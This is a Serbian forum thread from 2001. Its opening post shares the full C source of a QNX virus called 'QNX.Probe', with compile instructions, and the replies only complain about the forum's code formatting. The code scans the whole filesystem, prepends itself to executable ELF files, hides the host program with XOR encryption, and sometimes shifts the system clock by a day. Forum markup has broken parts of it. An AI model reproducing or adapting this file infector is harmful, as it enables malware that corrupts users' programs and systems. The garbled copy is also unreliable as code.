
QNX virus


uLtracode
Nemanja Marjanovic
Centar za Moderno Drustvo Sabac
Srbija/Sabac


icon QNX virus22.09.2001. u 22:08 - pre 274 meseci
QNX VIRUS !!! - 2001-09-21 @ 22:48:18 by Boris Posilovic
OS: QNX; Oblast: Virus; Oba?;

Evo, opet vam donosim još jedan ekskluzivan kod! Ovaj put QNX virus pod imenom QNX.Probe v1.1. Ovaj crv za QNX ELF dolazi kao dokument; crv je parazitskog tipa, nalazi se u skrivenim procesima tako da se skriva od ostalih korisnika. Inficira ELF dokumente u sistemu i ima QNX payload dodatak koji je napisan samo za ovaj virus i QNX OS. Ovaj crv je jako opasan, pa zato pazite! Nadam se da više nećete misliti da samo Windowsi imaju viruse, došlo je vreme UNIX virusa :))). Ovaj virus je izvorni QNX virus, nije klon UNIX virusa.
Uživajte...
Treba kompajlirati: cc probeb.c , strip probeb


#include // Declare necessary libraryes
#include
#include
#include
#include
#include
#include

#define virus_len 5440 // Define the size of the virus body

#define work_path "/" // Define the initial directory for scan,
// where virus will be looking for the files

#define byte_block virus_len // Define block size (used while copying)
#define name_len sizeof(our_name) // Define the size of virus name

char our_name[] = "QNX.Probe.b"; // Virus name and the infection mark
// at the same time

int our_fd, tmp_fd; // Declare variables

char buffer[byte_block], buffer1[byte_block], vir_buf[virus_len];

int process_file(const char*, const struct stat*, int); // Declare used
void check_payload(void); // functions

int main(int argc, char **argv, char **envp) // Main function
{
char *exec_tmp; // Declare yet another variables
ssize_t bytes_cnt;
pid_t pid;
if ((our_fd = open(argv[0], O_RDONLY)) != -1)
// Open currently runned file
{ // If file was opened, proceed the next commands...
if (read(our_fd, vir_buf, virus_len) == -1) exit(-1);
// Read virus_len bytes from this file
exec_tmp = tempnam(NULL, argv[0]);
// Create the name for temporary file
if ((tmp_fd = open(exec_tmp, O_WRONLY|O_CREAT|O_TRUNC, 0400|0200|0100)) == -1)
// And open this file
{ // If an error has occured whilt opening...
close(our_fd); // Close ourself
exit(-1); // Exit with error
}

while(1)
{ // Decryption procedure
unsigned csum0; // Declare yet another variable
if (read(our_fd, &csum0, 4) != 4) break;
// Read 4 bytes (there must be the checksum
// of the next going block
bytes_cnt = read(our_fd, buffer, byte_block);
// Read next going block
if (bytes_cnt == 0) break; // If no bytes was readed -
// exit procedure encryption
for(;;)
{ // Decryption
int key = rand() % 10000; // Take random key
int i; // Declare yet another....
unsigned csum=0; // And another....
for(i=0; i {
buffer1 = buffer ^ key; // XOR it with a key
key += our_name[i % name_len] ^ i; // Modify key
}
for(i=0; i // the uncrypted block
{
csum += buffer1 ^ i; // Get the checksum
csum = (csum >> 1) | (csum << 31); // Crypt it
}
if (csum == csum0) break; // If current checksum is equial to
// the saved - stop uncryption
} // Decryption ends
write(tmp_fd, buffer1, bytes_cnt); // Write uncrypted buffer
// to the temp file
} // Finish decription
close(tmp_fd); // Close temp file
close(our_fd); // Close ourself

check_payload();

pid = fork(); // system call fork()
if (pid == 0) // If it is parent process
{
execve(exec_tmp, argv, envp); // Run temp file
unlink(exec_tmp); // If an error - delete temp file
exit(-1); // and exit with an error
}
else if (pid > 0) // If it is not a parent process
{
ftw(work_path, process_file, 1);
// Scan directory tree and for each
// founded file call process_file()
}
unlink(exec_tmp); // Delete temp file
exit(0); // Exit
}
} // End of the function "main()"

int process_file(const char *vic_name, const struct stat *status, int type)
{ // Function "process_file()"
int vic_perm, vic_fd, bytes_cnt; // Declare necessary variables
vic_perm = status->st_mode; // Take file permissions
if ((status->st_mode&S_IFREG) && (status->st_mode&(S_IXUSR|S_IXGRP|S_IXOTH)))
{ // If it is a regular and executable file...
char *tmp_name; // Declare......
if (chmod(vic_name, S_IRUSR|S_IWUSR) == -1) return 0;
// Change permissions to the
// readable/writeable for current user
// If an error - exit function
if ((vic_fd = open(vic_name, O_RDWR)) == -1)
// Open victim file for read/write
{ // If an error has occured while opening...
chmod(vic_name, vic_perm); // Restore original permissions
return 0; // Exit function
}
tmp_name = tempnam(NULL, "tmp"); // Create temp file name
if ((tmp_fd = open(tmp_name, O_WRONLY|O_CREAT|O_TRUNC, 0400|0200|0100)) == -1)
// Open temp file
{ // If an error was occured while opening
close(vic_fd); // Close victim file
chmod(vic_name, vic_perm); // Restore it`s permissions
return 0; // Exit function
}
if ((bytes_cnt = read(vic_fd, buffer, byte_block)) == -1)
// Read block from victim
{ // If an error...
close(vic_fd); // Close victim file
close(tmp_fd); // Close temp file
unlink(tmp_name); // Delete temp file
chmod(vic_name, vic_perm); // Restore victim`s permissions
return 0; // Exit function
}
if (bytes_cnt > name_len)
{ // If was readed more than "name_len" bytes
char *i; // Declare.....
for(i=buffer; i<(buffer+byte_block-name_len); i++)
// For all readed bytes
{
if ((!strcmp(i, our_name)) || (strncmp(buffer+1, "ELF", 3)))
{ // If victim file is infected or isn`t an ELF file
close(vic_fd); // Close victim file
close(tmp_fd); // Close temp file
unlink(tmp_name); // Delete temp file
chmod(vic_name, vic_perm); // Restore permissions
return 0; // Exit function
}
}
}
lseek(vic_fd, 0, SEEK_SET); // Go to the beginning of the victim
write(tmp_fd, vir_buf, virus_len);
// Write virus body to the temp file
while((bytes_cnt = read(vic_fd, buffer, byte_block)) > 0)
// For all bytes of the block of the
// victim body
{ // Encryption procedure
int i; //
int key = rand() % 10000; // Declare...
unsigned csum=0; // And again...
for(i=0; i {
csum += buffer ^ i; // Get the checksum...
csum = (csum >> 1) | (csum << 31); // Crypt it
}
for(i=0; i {
buffer ^= key; // XOR byte
key += our_name[i % name_len] ^ i; // Modify the key
}
// } Encryption ends
write(tmp_fd, &csum, 4); // Write checksum to the temp file
write(tmp_fd, buffer, bytes_cnt);
// write block to the temp file
}
close(vic_fd); // Close victim
close(tmp_fd); // Close temp file
if (rename(tmp_name, vic_name) == -1)
// Rename temp file to the victim
{ // If an error was occured while renaming...
unlink(tmp_name); // Delete temp file
}
chmod(vic_name, vic_perm); // Restore victim`s permissions
}
return 0; // Exit function

} // End of the function "process_file()"

void check_payload(void)
{ // Payload function
srand(time(NULL)); // Initialize randomer
if (rand() % 900 == 555) // If random number equal to 555
{
struct timespec the_time; // Declare.......

clock_gettime(CLOCK_REALTIME, &the_time); // Get calendar time

the_time.tv_sec += (60 * 60) * 24; // Add one day
the_time.tv_nsec = 0; // Must to be zero

clock_settime(CLOCK_REALTIME, &the_time); // Set new calendar time
}
}



Ovo sam postavio samo zato što je zanimljivo da i male unix verzije mogu biti u opasnosti od virusa.

I don't need a reason!!!


 
Odgovor na temu

m r v a


icon Re: QNX virus22.09.2001. u 23:06 - pre 274 meseci
a yebo vas ...stavljajte kod u [ /code ]
 
Odgovor na temu

Gojko Vujovic
Amsterdam, NL


icon Re: QNX virus22.09.2001. u 23:33 - pre 274 meseci
Ne vredi mrvo, dok sadrzi <i>, postaje italic i kod ne radi :( Problem sa forumom, znam..
 
Odgovor na temu

m r v a


icon Re: QNX virus23.09.2001. u 01:21 - pre 274 meseci
pih ....... a da mi menjamo software za phorum ......neso cesto cujem rec "BUG" .....
 
Odgovor na temu

[es] :: Zaštita :: QNX virus

[ Pregleda: 3856 | Odgovora: 3 ] > FB > Twit

Postavi temu Odgovori

Srodne teme
Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.